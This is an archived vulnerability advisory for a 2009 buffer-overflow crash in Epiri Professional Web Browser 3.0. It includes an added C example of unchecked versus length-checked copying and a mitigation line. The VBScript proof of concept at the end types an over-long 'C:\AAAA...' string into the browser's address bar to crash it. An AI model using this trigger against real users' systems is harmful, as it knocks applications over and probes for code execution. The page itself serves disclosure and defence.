Vendor: Epiri Professional Web Browser
Discovered By: Gjoko 'LiquidWorm' Krstic
CVSS: 9.3 (HIGH)
Type: Remote Crash Exploit
CWE: 119
Product Name: Epiri Professional Web Browser
Affected Version From: 3.0.0.00
Affected Version To: 3.0.0.00
Patch Exists: Yes
Related CWE: N/A
CPE: a:horizon:epiri_professional_web_browser:3.0.0.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Microsoft Windows XP Professional SP3 (En)
Year: 2009

Epiri Professional Web Browser 3.0 Remote Crash Exploit

Epiri Professional Web Browser 3.0 is vulnerable to a remote crash exploit. The vulnerability is triggered when a malicious user supplies a specially crafted string of 257 characters to the application. This causes the application to crash and can be exploited to execute arbitrary code.
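The 257-character boundary reported above is the classic CWE-119 shape: input copied into a fixed-size buffer without a length check. The following C example is added here and is not Epiri code; it assumes an address-bar buffer of ADDR_MAX = 256 characters (consistent with the advisory's boundary but not confirmed by it) and shows the unchecked pattern beside a hardened copy that measures before it writes.

```c
/* Added illustration of the CWE-119 pattern behind this advisory; not Epiri code.
 * Assumption: the address bar holds at most ADDR_MAX (256) characters plus NUL,
 * which matches the advisory's 257-character boundary but is not confirmed. */
#include <stdio.h>
#include <string.h>

#define ADDR_MAX 256                /* assumed capacity in characters */

/* Constructed test input: "C:\" followed by 'A's, total_len characters in all,
 * the same shape as the advisory's "C:\AAAA...AAAA [257]" string. */
static char *build_path(size_t total_len, char *out, size_t out_size)
{
    if (total_len < 3 || total_len + 1 > out_size)
        return NULL;
    memcpy(out, "C:\\", 3);
    memset(out + 3, 'A', total_len - 3);
    out[total_len] = '\0';
    return out;
}

/* Unchecked pattern: strcpy into a fixed buffer. Instead of performing the
 * out-of-bounds write, report how many bytes would land past the buffer. */
static size_t unchecked_overrun(const char *src)
{
    size_t needed = strlen(src) + 1;     /* characters plus terminator */
    return needed > ADDR_MAX + 1 ? needed - (ADDR_MAX + 1) : 0;
}

/* Hardened pattern: measure first, reject over-long input, then copy. */
static int address_set(char dst[ADDR_MAX + 1], const char *src)
{
    size_t len = strlen(src);
    if (len > ADDR_MAX)
        return -1;                        /* refuse rather than truncate silently */
    memcpy(dst, src, len + 1);
    return 0;
}

int main(void)
{
    char path[512], bar[ADDR_MAX + 1];
    size_t lens[] = { 256, 257 };        /* one inside the limit, one at the advisory's boundary */
    for (size_t i = 0; i < 2; i++) {
        build_path(lens[i], path, sizeof path);
        printf("%zu chars: overrun %zu byte(s), hardened copy %s\n", lens[i],
               unchecked_overrun(path),
               address_set(bar, path) == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```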

Mitigation:

Users should update to the latest version of Epiri Professional Web Browser to mitigate this vulnerability.

Exploit-DB raw data:

' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
'
' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Note: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)
'
' Vulnerable strings:
'
' file://
' C::
' C:\AAAA...AAAA [257]
'
' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009
'
' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs

Dim crash, Success

Set crash = CreateObject("WScript.Shell")

With crash
    ' Wait until the browser window has the focus
    Do Until Success = True
        Success = crash.AppActivate("Epiri Professional 3.0")
    Loop

    ' Type the trigger string into the address bar and press Return
    '.SendKeys "file://"
    '.SendKeys "C::"
    .SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    .SendKeys "~" 'Return
End With

Wscript.Quit

# milw0rm.com [2009-07-30]